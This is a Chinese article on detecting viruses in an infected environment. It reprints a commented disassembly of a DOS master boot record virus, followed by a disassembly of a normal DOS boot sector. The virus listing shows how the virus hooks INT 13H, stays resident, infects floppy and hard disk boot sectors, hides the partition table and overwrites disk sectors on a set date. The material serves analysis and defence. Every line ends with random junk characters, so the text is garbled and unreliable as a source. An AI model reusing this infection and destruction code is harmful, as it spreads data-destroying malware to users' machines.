近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 r ^m8kYezQ
?? zree}VqD;5
?? 一 、 带毒环境下检测清除病毒的意义 gNsas:iGM
?? vIL'&~C\y
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 Ju"*;/
?? m=hlim;P,
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 ;!ICLkc$
?? gtV^6(Y
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 /s'7[bSv
?? _>G.
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 $mV1K)ege
?? C [Ap&S
?? 二 、带毒环境下检测清除病毒的原理 /3VSO"kcZ
?? oV(|51(f
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 #s\HiO$BT
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 _5nS!CN
8R) 0|v&;
=Ts3O0"[
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " hLqRF4>L
病毒体: x?aNK$A~X
JMP 01AF ;JMP到01AF JBYmy_Su
DB 00 ;病毒标计 .d JX,^
DW 00F5 ;此为搬到高位址后,远程跳转指令 C
V{kP8#
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX y.O%
DB 02 U/W<Sa\`
DW 0003 ;此为软盘识别标记,硬盘为0007 *[P"2b#
DW EC59 ; bc?\lD$$
DW F000 ;INT 13H的原入口 / bxu{|.
. R 2{ kS
. p>g5WebBN
. _6tir'z
. 1&,d,<
. ]tjQy1M
XOR AX,AX ;清除AX n0ZrgTVJ
MOV DS,AX; ;让DS=0000 ,R-T( <r
CLI ;清I标志积存器 lR[]A
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 _uYidtxo=
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 vky@L! &,
MOV SP,AX ;开机时为0000:7CB6 4
Wb^$i!
STI ;设I标志积存器 3>~W_c9@
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A wX!q dII)
PUSH AX ;用RETF,把程序转到引导或分区表位置 Qb.Ve7c
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 rT&rv^>f
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 u . xUM
MOV AX,[004E] ;取INT 13H的段地址 yobcAV`
MOV [7C0C],AX ;存到010C D?Mj<||
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 Y-&SZI4H
;读写以便传播发作 ,w9:)B7
vhEqHjR:
MOV AX,[0413] ;取得内存K数,放在AX |g$n-t
DEC AX ; D('
w<9.
DEC AX ;减2k内存 SJ4+s4!l
<
MOV [0413],AX ;存回,通常是638K R7nT,7k.
MOV CL,06 ; KBe\)Vs
SHL AX,CL ; } xy>uT
MOV ES,AX ;算出减2K后病毒本体的位址 8JFns-5
MOV [7C05],AX ;AX存入0105 b-`=^ny)K
]gw[
~
;病毒常用手法将系统高段内存减少以便驻留 c SV`?[a
;这样可以免于被其他程序覆盖 BidTrO
F3%8E<QZd;
MOV AX,000E ;病毒拦INT 13H @U 6jd4?)
;ISR起始的偏移量 yMd<<:Ap
MOV [004C],AX ; N4xCZb
MOV [004E],ES ;设原为病毒的INT 13H KkIgyLM
MOV CX,01BE ;病毒长度为1BE |#Gug('
MOV SI,7C00 ;从JMP 01AF开始 Sb/`a~q^
XOR DI,DI ;DI=0 SyB2A\A
CLD ;清方向标志 @{X<|,W9w
REPZ;
js$L<^7
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 PX} ~
CS: ;分区表能载入0000:7C00正常运作 k(]R;`f$W
JMP FAR [7C03] ;跳到为搬过后的位址 4X1!t
XOR AX,AX ;清AX .:b&$~<
MOV ES,AX ;ES=0000 _<8~CWo:
INT 13 ;复位磁盘 O7Z?y*
PUSH CS ; ^5GyW`a}
POP DS ;让DS=CS ~~B`\!n7
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 q;)+O#CR
MOV BX,7C00 ;读到0000:7C00 UA8*8%v
MOV CX,[0008] ;硬盘第0道,第7扇区 R ^ln-H;
CMP CX,+07 ;比较是否从硬盘启动 vg"$&YX9"
JNZ 0213 ;不是跳0213 }g9g]\.!a
MOV DX,0080 ;第一硬盘C:第零面 *6`};ASK
INT 13 ;用INT 13号中断,读 :;g7T -_q
JMP 023E ;跳023E比较日期,发作或正常开机 *B3 4
MOV CX,[0008] ;软盘0道,第3扇区 O6[4=4L
MOV DX,0100 ;A:的第0面 '|7'dlW
INT 13 ;INT 13读盘 YaT6vSz
JB 023E ;失败跳023E {tDH !sX
PUSH CS "C/X#y
POPES ;让ES=CS 7;i [
MOV AX,0201 ; Po1/_#mu
MOV BX,0200 ; XH`W(
MOV CX,0001 ; m+a\NXWR?N
MOV DX,0080 ; mWP1mc:M(
INT 13 ;读入C:的分区表到0200,以便下面比较 j(>~:9I`
JB 023E ;失败跳023E L|*0
A=6
XOR SI,SI ;清SI }|j\QjH
CLD ;清方向标志以便比较 11g_!X -g@
LODSW ;载入一个WORD到AX |nMg.t`8
CMP AX,[BX] ;比较有无病毒存在..E9AC 0zHMtC1,
JNZ 0287 ;没有则跳0287传染 O!U8"Yr$
LODSW ;载入一个WORD到AX /7CV7=^d,
CMP AX,[BX+02] ;再次确认..0000 Ds<~JfVl
JNZ 0287 ;没有跳0287 GpZ}xY'|w,
XOR CX,CX ;清CX Mjj5~by:
MOV AH,04 ; `Q!#v{
INT 1A ;取得日期 sq45fRAi
CMP DX,0306 ;是否为三月六日 9{cpxJ
JZ 024B ;是跳024B传染 b uu /Nz$
RETF ;把程序交还给引导启动完成 ]=Dzr<*v
_wp_y-"
步骤4:病毒INT 13代码分析 :AYhBhitC
方法:U /Pyj|!C3`q
PUSH DS ;首先把要用到积存器 #7r13$>!
PUSH AX ;入栈保存 t[4V1:
OR DL,DL ;比较是否为软盘 hqW),^\>'
JNZ 002F ;如不是则退出传染 Gpf9uj%
XOR AX,AX ;AX=0 RA$%3L[A!
MOV DS,AX ;数据代段=0 xh:A*ZI=7
TEST BYTE PTR [043F],01 ;比较是否为A盘
M/J?$j
JNZ 002F ;不是则退出 ]pq(Q:"P,5
POP AX ;将以上保存积存器 Z'!i"Jzq|{
POP DS ;弹栈恢复 E'cI} q
PUSHF ;压栈标志积存器 )C>8B`^S
CS: ;以便执行原INT 13 M 3&GO5<
CALL FAR [000A] ;执行原INT 13 |r+w(TG
PUSHF ;再次压栈 k4-S:kVo
CALL 0036 ;以便跳转到传染程序 !I jU *c@
POPF ;跳转到执行传染 $z[@DB[
RETF 0002 ;结束中断调用返回 p~3 (nk<+
POP AX ;恢复 <;lwvO
POP DS ;堆栈 H#/Hs#
CS: ;跳转到原正常INT 13 c\le8C3
JMP FAR [000A] ;地址执行 jY k5]2#A
vI20G89E
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 ^ u:bgwP
:Xs3Vh,V
步骤5:传染过程分析 :ggXVwpe
方法:U JI[{n~bhGD
对软盘传染过程: y!VL`xV
PUSH AX ;工 jR2^n`D
PUSH BX ;作 nt_FqUJ
PUSH CX ;寄 _ -|+k
PUSH DX ;存 ^O
QeOTF
PUSH DS ;器 D4O^5?F)|
PUSH ES ;入 Ke^9R-jP
PUSH SI ;栈 )W/_2Q.
PUSH DI ;保存 qH4+iSTnV
PUSH CS ;以压/弹栈方式 rtdEIk
POP DS ;使数据段DS和 `O]$FpO
PUSH CS ;附加段ES均指向 kD
me>E=
POP ES ;代码段CS ()W`4p
MOV SI,0004 ;试4次 Q%:Z&lgy
MOV AX,0201 ;设置各 &fW'_,-
MOV BX,0200 ;积存器 NXMZTZpB7
MOV CX,0001 ;为读软盘 u&Yd+');
XOR DX,DX ;引导扇区做准备 2 b80b50
PUSHF ;压栈标志积存器 c"diNbm[
CALL FAR [000A] ;正常的INT 13调用 TF?~vS%@P
JNB 0063 ;成功则转判断 [D"5@
XOR AX,AX ;不成功复位 Py\/p Fvg
PUSHF ;磁盘继续读 9\VV++}s>o
CALL FAR [000A] ;如果4次 aMJJ|iiU
DEC SI ;均匀不成功 O4cBn{Dq9
JNZ 0045 ;则退出跳转 `$MO;Fv,G
JMP 00A6 ;退出传染 :W#?U yo
XOR SI,SI ;SI=0以便用 }.D adV
CLD ;LODSW读入软盘 r72zWpF!Ss
LODSW ;第1或第2字进行比较 <m,bP
c :R
CMP AX,[BX] ;比较如果不包含病毒标志 oDWNOw
JNZ 0071 ;则跳转写传染 p_i',5H(
LODSW ;如果已有标志 $ I
J^
CMP AX,[BX+02] ;则退出 .I]EP-
JZ 00A6 ;传染子程序 32Wa{LG;2
MOV AX,0301 ;为写盘准备
akG|ic-~
MOV DH,01 ;如果是360K <tW/9}@p9
MOV CL,03 ;则写到1面0道3扇区 IEe;ygL#
CMP BYTE PTR [BX+15],FD ;比较软盘 T^ - - :1
JZ 0080 ;如果大于360K }L
@~!=q*
MOV CL,0E ;写到1面0道14扇区 b3ys"Vyn
MOV [0008],CX ;写病毒标志到软盘 +R_s(2vz
PUSHF ;调用原INT 13 <Ira~N
CALL FAR [000A] ;进行传染 w~3z);
JB 00A6 3bT?4
MOV SI,03BE ;以下是将正常 :jJ0 +Q
MOV DI,01BE ;引导扇区从 LfJMSscfv
MOV CX,0021 ;1BE起的21字节内容 >`<qa!9
CLD ;搬移到病毒程序尾部 2t?Vl%<
REPZ ;开始复制 xyHv7u%*
MOVSW _p?s[r*
MOV AX,0301 ;写盘功能调用,写一个扇区 *;l[|
XOR BX,BX ;将病毒程序 wEw;],ur
MOV CX,0001 ;写入软盘引导扇区内 $&Z<4:Flc
XOR DX,DX ;设置为软盘 tF\_AvL_8
PUSHF gYloY=.Z$'
CALL FAR [000A] ;执行正常INT 13调用写盘 ]G^9PZ-
POP DI ;将 (C.aQ)|T
POP SI ;工 Y?-Ef
sK
POP ES ;作 C=bQ2t=Z
POP DS ;寄 1Beh&pl^
POP DX ;存 7eW6$$ju,N
POP CX ;器 mC3:P5/c
POP BX ;退 h+S]C#X,}
POP AX ;栈 ND/oKM+?
RET ;返回调用处 cqT%6Si
对硬盘传染过程: !r9rTS]
MOV CX,0007 ;第7扇区 $~\Tl:!#?
MOV [0008],CX ;此处为硬盘引导标记 0Hx'C^m72
MOV AX,301 ;写功能调用 KL*+gq0k
MOV DX,0080 ;设置为硬盘 qTN30(x2
INT 13 ;将正常引导扇区写到0面0道7扇区内 Kw2]J)TO
JB 13E ;失败则转 ?O"zp65d(
MOV SI,03BE ;原分区表地址 IJC]Al,df
MOV DI,01BE ;目标地址 ["e;8H[K)%
MOV CX,0021 ;整个分区表 %-BwK
REPNZ ..w$p-1
MOVSW ;开始复制 I:0dz:T7*
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 ":qS9vW
;这样在分析着查看硬盘分区信息时仍能看到该部分 $ab{GxmX'4
;内容,以次来麻痹分析者 5bd4]1gj
MOV AX,0301 ;准备写病毒提进硬盘 m_FTg)_=
XOR BX,BX ;病毒体位置 uJ8FzS>[V
INC CL ;第一扇区 D[6wMep^n
INT 13 ;开始写盘传染 O-box?
JMP 013E ;转到13E处判断是否为3月6日,是则发作 @jq H8
N`qGwNT%G
步骤6:破坏过程分析 5kA D vi.
方法:U gZ-:4G|J
主要分析对硬盘数据破坏: 4G hg~0
. )6eFYt%c
. EfkBo5@ Qi
. 1#8~@CQ ::
. =h|7bYLy
. +n)bWB%
MOV DL,80 d*=qqe
H
MOV BYTE PTR[0007],04 a&dP@)
;准备写硬盘 ylDfr){
MOV AL,11 ;写17个扇区 7[i&EPN
MOV BX,5000 "{3MXAFe
MOV ES,BX ;从内存ES:5000中处开始写 /<dl"PWkJv
INT 13 ;残不人睹
OAEa+V
JNB 0179 ;成功转179继续写 EW3--33s
XOR AH,AH P ?96;
INT 13 ;不成功复位磁盘继续 #a'CoJs
INC DH ;使写操作磁头加1继续? nA%8
bZ+
CMP DH,[0007] ;比较是否小于0007单元值 7M_GGjP
JB 0150 ;是则返回开始处继续写 07:h4beT
XOR DH,DH ;DH=0 )i\foSbB`V
INC CH ;再加扇区 NE3/>5
JMP 0150 ;反回继续写 V8b^{}nxt
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 %o`Cp64`Q
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 ;=@?( n
;和文件分配表。 f9hH{(A
v+dT7*^@
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 ]iZ-MG)J
读盘的时将自身写入磁盘。 QkLcs6)R
引导过程如下: 3E>]6
1>调整堆栈位置 \lyHQ-gWhc
2>修改并用修改后的磁盘参数表来复位磁盘系统 ! \5)!B
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 6)FM83zk)K
4>读入根目录表的首扇区 U.<a d
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS KqNsCT+j
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 &yqk96z
7>跳到0000:0700H处执行IO.SYS,引导完毕 qQS&K%F
003E FA CLI f9'dZ}B
003F 33C0 XOR AX,AX M?kXzb\O
0041 8ED0 MOV SS,AX kq(]7jU$[
0041 8ED0 MOV SS,AX +!G)N~o
0043 BC007C MOV SP,7C00 ; 初始化堆栈 u
N_< G
0046 16 PUSH SS U;gy4rj
0047 07 POP ES ;(ES)=0000H -cUw}
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H ^Nysx ~6
004B 36 SS: ;(SS)=0000H pwF])uf*{\
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI ENf(E9O
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表 6U]r 3
Rr
004F 56 PUSH SI ;取到后压入堆栈中保存 %*Yb
J_j7
0050 16 PUSH SS 1z@ ncqe
0051 53 PUSH BX ;保存地址0000:0078H uiWo<}t}{
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推 |voZ0U
0055 B90B00 MOV CX,000B ;磁盘参数表共11字节 ESe$6)P
0058 FC CLD 'ztY>KV j
0059 F3 REPZ j"&Oa&SH
005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处 uFOYyrESc
005B 06 PUSH ES 9v7}[`^
005C 1F POP DS ;(DS)=0000H 0 Gq<APtr
005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间" AQc9@3T~Bi
0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数" T3-/+4$0v
0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数" X"T)X#:)
0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址) 2V$YZSw6q
006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号 +.X3&|@k
006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表 e^hI[LbNC
0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘 <_4'So>
0072 7279 JB 00ED ;出错则转出错处理 \r&(l1R
jfZ)
; 下面一段程序计算扇区位置 XZ/cREz^s
0074 33C0 XOR AX,AX *bi;mQ
0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数 al4X}
007A 7408 JZ 0084 ;为零表示大硬盘? 0EC/l
OS
007C 8B0E137C MOV CX,[7C13] ;不为0则取出来放到偏移0020H处 ^K^rl9
0080 890E207C MOV [7C20],CX ;这个值本程序未用,似乎为IO.SYS准备的 j 2e|
0084 A0107C MOV AL,[7C10] ;取FAT表的个数 "}uV=y
0087 F726167C MUL WORD PTR [7C16] ;乘以一个FAT表所占的扇区数 Angt=q
008B 03061C7C ADD AX,[7C1C] ;加上Dos分区前的扇区数(隐藏扇数,低位) Wix4se1Ac
008F 13161E7C ADC DX,[7C1E] ; 高位 <"LA70Hkk
0093 03060E7C ADD AX,[7C0E] ;加上Dos分区内的保留扇区数(低位) ket"fXqJX
0097 83D200 ADC DX,+00 ; (高位) OL623jQX
009A A3507C MOV [7C50],AX ;根目录表的首扇的逻辑扇区号(低位) So#>x5dL
009D 8916527C MOV [7C52],DX ; (高位) IpVtbDW
00A1 A3497C MOV [7C49],AX ;此处放IO.SYS的首扇的逻辑扇区号(低位) .L_ Hk
00A4 89164B7C MOV [7C4B],DX ; (高位) CW~c<,"
00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节 oCB#i~|>a
00AB F726117C MUL WORD PTR [7C11] ;乘以根目录表中的项数 t>"|~T$9
00AF 8B1E0B7C MOV BX,[7C0B] ;取"每扇区的字节数" s18A
00B3 03C3 ADD AX,BX ;这两条指令是为了取整 YKa9]Q
00B5 48 DEC AX =%+xNOdN7?
00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数 &"X1w $
00B8 0106497C ADD [7C49],AX ;得到根目录表后首扇的逻辑扇区号(低位) ~|`jIqU
00BC 83164B7C00 ADC WORD PTR [7C4B],+00 ; (高位) (KT+7j0^
;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS g=S|lVQm
00C1 BB0005 MOV BX,0500 ;内存缓冲区的偏移值 CrX1qyR
00C4 8B16527C MOV DX,[7C52] ;取根目录表的首扇的逻辑扇区号(高位) smuQ1.b
00C8 A1507C MOV AX,[7C50] ; (低位) GUsJF;;V
00CB E89200 CALL 0160 ;将逻辑扇区号转换为物理扇区号 Ewo6Q){X
00CE 721D JB 00ED ;出错则转出错处理 M =GF@C;b
00D0 B001 MOV AL,01 v0+$d\mP4<
00D2 E8AC00 CALL 0181 ;读一个扇区到内存(根目录的首扇) 0y/P
00D5 7216 JB 00ED ;出错处理 Bv}nG|
00D7 8BFB MOV DI,BX ;内存缓冲区的首址 V_T~5%9Fy
00D9 B90B00 MOV CX,000B ;比较11个字节 (vbI4&r
00DC BEE67D MOV SI,7DE6 ;偏移01E6处是串"IO SYS",长11字节 Aj@t*3
00DF F3 REPZ DcZ,a E]
00E0 A6 CMPSB ;看第一项是否为IO.SYS ]DI%7kw'
00E1 750A JNZ 00ED ;不是则出错 }/F9(m
00E3 8D7F20 LEA DI,[BX+20] ;跳过32字节就指向第二项 4zf(
00E6 B90B00 MOV CX,000B ;比较11个字节 Z]^O=kX7k
00E9 F3 REPZ m?`$NJST
00EA A6 CMPSB ;看第二项是否为MSDOS.SYS f`p"uLNo<
00EB 7418 JZ 0105 ;是则两个文件都已找到,跳过出错处理 P".rm0@R
iKgH
:[j
;下面一段进行出错处理 aX35^K /
00ED BE9E7D MOV SI,7D9E ;偏移019EH处是串"Non system disk..." f >\~h,SLL
00F0 E85F00 CALL 0152 ;显示字符串 $`Aps7A
00F3 33C0 XOR AX,AX N`5
mPE
00F5 CD16 INT 16 ;等待任一键按下 h)
W|~y@
00F7 5E POP SI @5TJ]=
00F8 1F POP DS ;得到1EH号中断向量的地址0000:0078H H`8}w{ft&
00F9 8F04 POP [SI] 4NmLbM&C8
00FB 8F4402 POP [SI+02] ;恢复1EH号中断向量的内容 _U%2J4T2
00FE CD19 INT 19 ;自举 mvGj
!'
0100 58 POP AX /QVhT
0101 58 POP AX ')j@OO3
0102 58 POP AX ;清理堆栈 mbO.Kyfen
0103 EBE8 JMP 00ED ;再次试图起动 n7'X.=o7
uJL[m(G
;下面读入IO.SYS的头3个扇区到内存0000:0700H处 !a9/8U_>XF
0105 8B471A MOV AX,[BX+1A] ;从根目录表第一项中取IO.SYS的首簇号 ~*ll,<L:
0108 48 DEC AX ykG^(.E
0109 48 DEC AX ;首簇号减二 Z`kI6
010A 8A1E0D7C MOV BL,[7C0D] ;取每簇的扇区数 DsGtc<l%
010E 32FF XOR BH,BH O.OSLezTQ
0110 F7E3 MUL BX ;(首簇号 - 2)乘以 每簇的扇区数 EB[B0e7}
0112 0306497C ADD AX,[7C49] ;相加后得到IO.SYS的首扇的逻辑扇区号 *`bAu *
0116 13164B7C ADC DX,[7C4B] 5U%a$.yr
011A BB0007 MOV BX,0700 ;内存缓冲区的偏移值 X?q,m4+
011D B90300 MOV CX,0003 ;循环计数初值,读3个扇区 UWq[K&vQZ
0120 50 PUSH AX ;逻辑扇区号进栈(低位) _w49@9?
0121 52 PUSH DX ; (高位) kV+O|9
0122 51 PUSH CX ;循环计数器进栈 r7n-Xe
0123 E83A00 CALL 0160 ;逻辑扇区号转换为物理扇区号 2< Q3-|/i
0126 72D8 JB 0100 ;出错处理 ]"4\]_?r
0128 B001 MOV AL,01 %PxJnMb?
012A E85400 CALL 0181 ;读一个扇区到内存缓冲区 I?%iJ%
012D 59 POP CX ;循环计数出栈 bupDnTF
012E 5A POP DX ;Fm7!@u^0
012F 58 POP AX ;逻辑扇区号出栈 ^`oyf{w@
0130 72BB JB 00ED ;读盘出错处理 O{nM
yB
0132 050100 ADD AX,0001 zsha/:b
0135 83D200 ADC DX,+00 ;下一个扇区 eh}{\P
0138 031E0B7C ADD BX,[7C0B] ;缓冲区指针移动一个扇区的大小 fkK42*U@r
013C E2E2 LOOP 0120 ;循环读入三个扇区 m8<l2O=m
013E 8A2E157C MOV CH,[7C15] ;取"磁盘介质描述",传给IO.SYS K,L
0142 8A16247C MOV DL,[7C24] ;取"系统文件所在的驱动器号" KcNh3CR
0146 8B1E497C MOV BX,[7C49] ;取IO.SYS的首扇的逻辑扇区号 UqaV9
014A A14B7C MOV AX,[7C4B] x6B_5eF
014D EA00007000 JMP 0070:0000 ;执行IO.SYS,引导完毕 }o MY
;显示字符串的子程序 v6`TbIq%
0152 AC LODSB ;从串中取一个字符 pcjb;&<
0153 0AC0 OR AL,AL $oU40HA)W]
0155 7429 JZ 0180 ;为0则已到串尾,返回(共用RET指令) E]j2%}6Z%
0157 B40E MOV AH,0E 7Q3a0`Iq
0159 BB0700 MOV BX,0007 D "9Hv3
015C CD10 INT 10 ;显示该字符 !`?*zf
015E EBF2 JMP 0152 ;循环显示下一个 Kn+m9
;将逻辑扇区号转换为物理扇区号的子程序 l9Sx'<
0160 3B16187C CMP DX,[7C18] ;这两条指令是为了避免第二次除法时除数 WaYT7 :
0164 7319 JNB 017F ;为0 or{X{_X7
0166 F736187C DIV WORD PTR [7C18] ;逻辑扇取号除以每道扇区数,商(AX)=总磁 maR5hgWCHe
016A FEC2 INC DL ;道数,余数(DX)再加一即为扇区号,因为扇 beCTOmC
016C 88164F7C MOV [7C4F],DL ;区号是从1开始的,而不是从0开始 XKt">W
0170 33D2 XOR DX,DX V[T`I a\
0172 F7361A7C DIV WORD PTR [7C1A] ;总磁道数(AX)再除以面数,所得的 yYM_
0176 8816257C MOV [7C25],DL ;余数(DX)=面号(即磁头号) r^|AiYI)
017A A34D7C MOV [7C4D],AX ;商(AX)=磁道号 ({_Dg43O'[
017D F8 CLC S.X*)CBB
017E C3 RET ;正常返回 ^%pM$3ov
017F F9 STC 4tv}V:EO
0180 C3 RET ;异常返回 bhWH
;读一个扇区的子程序 V"{+cPBO)
0181 B402 MOV AH,02 ;读功能调用 251^>x.R
0183 8B164D7C MOV DX,[7C4D] ;需要的入口参数如下: 4PzCm k
0187 B106 MOV CL,06 ;(DL)=驱动器号 \E3evU
0189 D2E6 SHL DH,CL ;(DH)=面号 /?wH1 ,
018B 0A364F7C OR DH,[7C4F] ;(CH)=磁道号 <i(<|/$
018F 8BCA MOV CX,DX ;(CL)=扇区号(第6,7位为磁道号的高2位) T2^0Q9E?
0191 86E9 XCHG CH,CL ;(AL)=要读的扇区数 sHSD`mYq
0193 8A16247C MOV DL,[7C24] ;(ES:BX)=缓冲区首址 xVn"xk
0197 8A36257C MOV DH,[7C25] 5VG[FY6Pl
019B CD13 INT 13 RiX~YLeM
019D C3 RET ;>duY\$<
9x下的主引导/引导扇区没大区别,为了识别大分区用了一个INT 13的扩展调用42H。 &